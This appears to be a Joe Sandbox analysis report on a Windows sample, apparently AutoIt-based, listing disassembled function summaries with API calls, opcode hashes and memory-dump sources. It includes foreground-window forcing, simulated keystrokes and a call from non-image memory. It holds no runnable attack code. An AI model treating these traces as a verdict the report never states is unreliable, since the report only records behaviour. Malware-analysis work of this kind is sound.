                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: LoadString
                                                      • String ID:
                                                      • API String ID: 2948472770-0
                                                      • Opcode ID: 6bafee953130cacc99fbbe6da23c6a2625c3cb02743ed5565b07ed23bd86d7a8
                                                      • Instruction ID: 3926264afd0cb7743e1c30dddc9c2e94c5a29af4e990c09795c08a20799ae7c4
                                                      • Opcode Fuzzy Hash: 6bafee953130cacc99fbbe6da23c6a2625c3cb02743ed5565b07ed23bd86d7a8
                                                      • Instruction Fuzzy Hash: 7BD15B75A05209EFCB14EF98C8819EEBBF5FF88314F145059E955BB291EB30AD81CB90
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction ID: b51f8c76c9442941210260bde10b1a80fb2e9b3674fc306d7c87be2d77e9653f
                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction Fuzzy Hash: DB310474A00109DBCB18CF59E4C0A69FBA1FF49704B24A6A5E80AEF656D731EDC1CBC0
                                                      APIs
                                                        • Part of subcall function 00E34E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E34EDD,?,00F01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00E34E9C
                                                        • Part of subcall function 00E34E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E34EAE
                                                        • Part of subcall function 00E34E90: FreeLibrary.KERNEL32(00000000,?,?,00E34EDD,?,00F01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00E34EC0
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00F01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00E34EFD
                                                        • Part of subcall function 00E34E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E73CDE,?,00F01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00E34E62
                                                        • Part of subcall function 00E34E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E34E74
                                                        • Part of subcall function 00E34E59: FreeLibrary.KERNEL32(00000000,?,?,00E73CDE,?,00F01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00E34E87
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Library$Load$AddressFreeProc
                                                      • String ID:
                                                      • API String ID: 2632591731-0
                                                      • Opcode ID: def55a2ee248b78819cc5f0f8380ae92547fee7c08396a4217937dad195b1204
                                                      • Instruction ID: a712a76a91b4259e5e6511e7cd5e167538e04925b5c7523bcbd7d10beb4aad37
                                                      • Opcode Fuzzy Hash: def55a2ee248b78819cc5f0f8380ae92547fee7c08396a4217937dad195b1204
                                                      • Instruction Fuzzy Hash: C5112372700305AACB14AB74DC0AFAD7BE5AF40710F24A42DF542BA1C1EE71AA05DB50
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: __wsopen_s
                                                      • String ID:
                                                      • API String ID: 3347428461-0
                                                      • Opcode ID: 7b8806e17f9cfbc46a75aca3990342bf82d64a976402e9f0bc60d702e95fe9f4
                                                      • Instruction ID: dffbdfb222b10cf233dfbf5baa81535d9f9506e29ec12893dec5f3da36f4fd0c
                                                      • Opcode Fuzzy Hash: 7b8806e17f9cfbc46a75aca3990342bf82d64a976402e9f0bc60d702e95fe9f4
                                                      • Instruction Fuzzy Hash: EF11187590410AAFCB15DF58E941A9E7BF5EF48314F104199F818AB312DA31DA11CBA5
                                                      APIs
                                                        • Part of subcall function 00E64C7D: RtlAllocateHeap.NTDLL(00000008,00E31129,00000000,?,00E62E29,00000001,00000364,?,?,?,00E5F2DE,00E63863,00F01444,?,00E4FDF5,?), ref: 00E64CBE
                                                      • _free.LIBCMT ref: 00E6506C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap_free
                                                      • String ID:
                                                      • API String ID: 614378929-0
                                                      • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                      • Instruction ID: 526ad4d52110a9cc6820b080a7b8ec1547eb433042fd129ef99394e1a5cea33d
                                                      • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                      • Instruction Fuzzy Hash: 710126732447056BE3218F65E881A9AFBE8FB893B0F25051DE194A32C0EA30A905C7B4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                      • Instruction ID: 72e9a84d15763991118e91917e8f85604ba65785ddba7df9149ae6342ea518dc
                                                      • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                      • Instruction Fuzzy Hash: 51F04932500A109AC7353A259C05B5A33C98F923F7F101F15FC21B22D1CBB0D90986A5
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _wcslen
                                                      • String ID:
                                                      • API String ID: 176396367-0
                                                      • Opcode ID: b66f2ccc6a42f866386a2c3f527481c72d49d8aa6e16cad6a22e3b4c4ac6860b
                                                      • Instruction ID: 0b0519af1c57620da85c1da83ed2694483b64661c64c5b5618884107f3f1e3d3
                                                      • Opcode Fuzzy Hash: b66f2ccc6a42f866386a2c3f527481c72d49d8aa6e16cad6a22e3b4c4ac6860b
                                                      • Instruction Fuzzy Hash: 81F0C8B36006016ED7159F28D807BA7BBD4EF44760F50852AFA19DB1D1DB71E514C7A0
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000008,00E31129,00000000,?,00E62E29,00000001,00000364,?,?,?,00E5F2DE,00E63863,00F01444,?,00E4FDF5,?), ref: 00E64CBE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: ce673951a691e7f193b3f6acc1b3692a16c5e652ac2e05a4a40d4678a148615a
                                                      • Instruction ID: 2ca98a6b115300911138d5eca740ac1ee28ea2eff5d1d29f49f17d69d82ad73e
                                                      • Opcode Fuzzy Hash: ce673951a691e7f193b3f6acc1b3692a16c5e652ac2e05a4a40d4678a148615a
                                                      • Instruction Fuzzy Hash: 90F0BBB168212466FB215F66BC05F56B7C8BF817E5B186111FC15B63D0CA30D80156E0
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,?,00F01444,?,00E4FDF5,?,?,00E3A976,00000010,00F01440,00E313FC,?,00E313C6,?,00E31129), ref: 00E63852
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: d0fe4dd26b03e0c28b22c73e6f558402a4627ba50540cf400afaaca826ed33fc
                                                      • Instruction ID: 99abefcf7840c056d7f264c555b3756a126d9ad912f536247f31a5153dd38dce
                                                      • Opcode Fuzzy Hash: d0fe4dd26b03e0c28b22c73e6f558402a4627ba50540cf400afaaca826ed33fc
                                                      • Instruction Fuzzy Hash: 46E0E5311812245AE6292677BC05BDA36C9AB427F9F193220FC05B74D2CB11DD0282E0
                                                      APIs
                                                      • FreeLibrary.KERNEL32(?,?,00F01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00E34F6D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      • Opcode ID: 1f35e08d95be230739613567cf081909c49611afff5c07cabf07db9a70969e95
                                                      • Instruction ID: 8e524cb45dbae1bb8c8a89f8d6535b4307c46f43e5b0349043f8a07ff99ef368
                                                      • Opcode Fuzzy Hash: 1f35e08d95be230739613567cf081909c49611afff5c07cabf07db9a70969e95
                                                      • Instruction Fuzzy Hash: C1F0A0B0205701CFCB348F21D498812BBF0FF00319728A9BEE1DAA2650C731A848DF00
                                                      APIs
                                                      • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,00E7EE51,00EF3630,00000002), ref: 00E9CD26
                                                        • Part of subcall function 00E9CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,00E9CD19,?,?,?), ref: 00E9CC59
                                                        • Part of subcall function 00E9CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,00E9CD19,?,?,?,?,00E7EE51,00EF3630,00000002), ref: 00E9CC6E
                                                        • Part of subcall function 00E9CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,00E9CD19,?,?,?,?,00E7EE51,00EF3630,00000002), ref: 00E9CC7A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: File$Pointer$Write
                                                      • String ID:
                                                      • API String ID: 3847668363-0
                                                      APIs
                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E32DC4
                                                        • Part of subcall function 00E36B57: _wcslen.LIBCMT ref: 00E36B6A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: LongNamePath_wcslen
                                                      • String ID:
                                                      • API String ID: 541455249-0
                                                      APIs
                                                        • Part of subcall function 00E33837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E33908
                                                        • Part of subcall function 00E3D730: GetInputState.USER32 ref: 00E3D807
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E32B6B
                                                        • Part of subcall function 00E330F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00E3314E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                      • String ID:
                                                      • API String ID: 3667716007-0
                                                      APIs
                                                      • CreateFileW.KERNELBASE(00000000,00000000,?,00E70704,?,?,00000000,?,00E70704,00000000,0000000C), ref: 00E703B7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      APIs
                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00E31CBC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: InfoParametersSystem
                                                      • String ID:
                                                      • API String ID: 3098949447-0
                                                      APIs
                                                        • Part of subcall function 00E35745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00E3949C,?,00008000), ref: 00E35773
                                                      • GetLastError.KERNEL32(00000002,00000000), ref: 00EA76DE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CreateErrorFileLast
                                                      • String ID:
                                                      • API String ID: 1214770103-0
                                                      APIs
                                                      • Sleep.KERNELBASE(000001F4), ref: 01488FD1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2159335392.0000000001486000.00000040.00000020.00020000.00000000.sdmp, Offset: 01486000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1486000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      APIs
                                                      • CloseHandle.KERNELBASE(?,?,00000000,00E724E0), ref: 00E36266
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID:
                                                      • API String ID: 2962429428-0
                                                      APIs
                                                      • Sleep.KERNELBASE(000001F4), ref: 01488FD1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2159335392.0000000001486000.00000040.00000020.00020000.00000000.sdmp, Offset: 01486000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1486000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      APIs
                                                        • Part of subcall function 00E49BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E49BB2
                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00EC961A
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EC965B
                                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00EC969F
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EC96C9
                                                      • SendMessageW.USER32 ref: 00EC96F2
                                                      • GetKeyState.USER32(00000011), ref: 00EC978B
                                                      • GetKeyState.USER32(00000009), ref: 00EC9798
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EC97AE
                                                      • GetKeyState.USER32(00000010), ref: 00EC97B8
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EC97E9
                                                      • SendMessageW.USER32 ref: 00EC9810
                                                      • SendMessageW.USER32(?,00001030,?,00EC7E95), ref: 00EC9918
                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00EC992E
                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00EC9941
                                                      • SetCapture.USER32(?), ref: 00EC994A
                                                      • ClientToScreen.USER32(?,?), ref: 00EC99AF
                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00EC99BC
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00EC99D6
                                                      • ReleaseCapture.USER32 ref: 00EC99E1
                                                      • GetCursorPos.USER32(?), ref: 00EC9A19
                                                      • ScreenToClient.USER32(?,?), ref: 00EC9A26
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00EC9A80
                                                      • SendMessageW.USER32 ref: 00EC9AAE
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00EC9AEB
                                                      • SendMessageW.USER32 ref: 00EC9B1A
                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00EC9B3B
                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00EC9B4A
                                                      • GetCursorPos.USER32(?), ref: 00EC9B68
                                                      • ScreenToClient.USER32(?,?), ref: 00EC9B75
                                                      • GetParent.USER32(?), ref: 00EC9B93
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00EC9BFA
                                                      • SendMessageW.USER32 ref: 00EC9C2B
                                                      • ClientToScreen.USER32(?,?), ref: 00EC9C84
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00EC9CB4
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00EC9CDE
                                                      • SendMessageW.USER32 ref: 00EC9D01
                                                      • ClientToScreen.USER32(?,?), ref: 00EC9D4E
                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00EC9D82
                                                        • Part of subcall function 00E49944: GetWindowLongW.USER32(?,000000EB), ref: 00E49952
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00EC9E05
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                      • String ID: @GUI_DRAGID$F
                                                      • API String ID: 3429851547-4164748364
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00EC48F3
                                                      • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00EC4908
                                                      • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00EC4927
                                                      • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00EC494B
                                                      • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00EC495C
                                                      • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00EC497B
                                                      • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00EC49AE
                                                      • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00EC49D4
                                                      • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00EC4A0F
                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00EC4A56
                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00EC4A7E
                                                      • IsMenu.USER32(?), ref: 00EC4A97
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00EC4AF2
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00EC4B20
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00EC4B94
                                                      • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00EC4BE3
                                                      • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00EC4C82
                                                      • wsprintfW.USER32 ref: 00EC4CAE
                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00EC4CC9
                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00EC4CF1
                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00EC4D13
                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00EC4D33
                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00EC4D5A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                      • String ID: %d/%02d/%02d
                                                      • API String ID: 4054740463-328681919
                                                      APIs
                                                      • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00E4F998
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E8F474
                                                      • IsIconic.USER32(00000000), ref: 00E8F47D
                                                      • ShowWindow.USER32(00000000,00000009), ref: 00E8F48A
                                                      • SetForegroundWindow.USER32(00000000), ref: 00E8F494
                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E8F4AA
                                                      • GetCurrentThreadId.KERNEL32 ref: 00E8F4B1
                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E8F4BD
                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00E8F4CE
                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00E8F4D6
                                                      • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00E8F4DE
                                                      • SetForegroundWindow.USER32(00000000), ref: 00E8F4E1
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E8F4F6
                                                      • keybd_event.USER32(00000012,00000000), ref: 00E8F501
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E8F50B
                                                      • keybd_event.USER32(00000012,00000000), ref: 00E8F510
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E8F519
                                                      • keybd_event.USER32(00000012,00000000), ref: 00E8F51E
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E8F528
                                                      • keybd_event.USER32(00000012,00000000), ref: 00E8F52D
                                                      • SetForegroundWindow.USER32(00000000), ref: 00E8F530
                                                      • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00E8F557
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
